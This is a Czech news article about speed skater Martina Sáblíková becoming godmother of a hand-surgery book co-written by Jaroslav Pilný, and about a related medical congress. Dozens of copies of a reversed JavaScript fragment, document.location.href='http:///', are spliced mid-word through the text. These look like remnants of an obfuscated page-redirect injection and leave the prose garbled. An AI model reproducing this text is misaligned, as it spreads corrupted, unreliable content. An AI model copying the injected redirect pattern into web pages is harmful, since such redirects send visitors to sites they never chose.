Rainbow page separator

Martina Sáblíková se stala kmotrou knihy Chirurgie ruky II.

Úterý, 7. listopadu 2017

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Rychlobruslařka Martina Sáblíková se stala kmotrou knihy, jejímž spoluau[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torem je primář or[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topedického oddělení novoměstské nemocnice Jaroslav Pilný, který je zároveň spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovním lékařem českých rychlobruslařů. „Martiny Sáblíkové si vážím pro její skromnost a píli, díky čemuž se dostala až na vrchol spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní kariéry,“ uvedl Jaroslav Pilný. Au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torsky se na knize podílel také přední německý chirurg působící ve Spojených arabských emirátech Roman Slodička. „Oficiální představení aktualizovaného vydání knihy, která v roce 2011 získala Chlumského cenu České společnosti pro or[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topedii a trauma[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologii za nejlepší práci v oboru or[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topedie a trauma[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologie, proběhne v rámci kongresu Chirurgie ruky, který se uskuteční ve dnech 9. – 11. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu v hotelu Skalský dvůr,“ přiblížil mluvčí nemocnice Petr Hladík.
Při kongresu se setkají lékaři a zdravotníci ze všech oborů, které se chirurgii ruky věnují. „Je třeba si uvědomit, že na diagnostice a léčbě rukou se u nás podílejí trauma[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologové, or[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topedi, chirurgové, neurologové, neurochirurgové, fyzioterapeuti a ergoterapeuti. K setkání jsme vyzvali také ana[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomy. Chceme, aby ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to medicína nebyla jenom jednooborová, ale lidé, kteří se léčbě věnují, musí mít komplexní znalosti,“ uvedl coby prezident kongresu Jaroslav Pilný.
Kromě tuzemských odborníků budou na kongresu přednášet také zahraniční hosté. „Přestaví se například profesor Dominique Thomas – šéf rehabilitační kliniky v Grenoblu, který se podílel na nedávné rehabilitaci tenistky Petry Kvi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové. Přijede také dok[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor Daniel Herren z Zurichu – odborník na implantaci drobných kloubů,“ doplnil Jaroslav Pilný.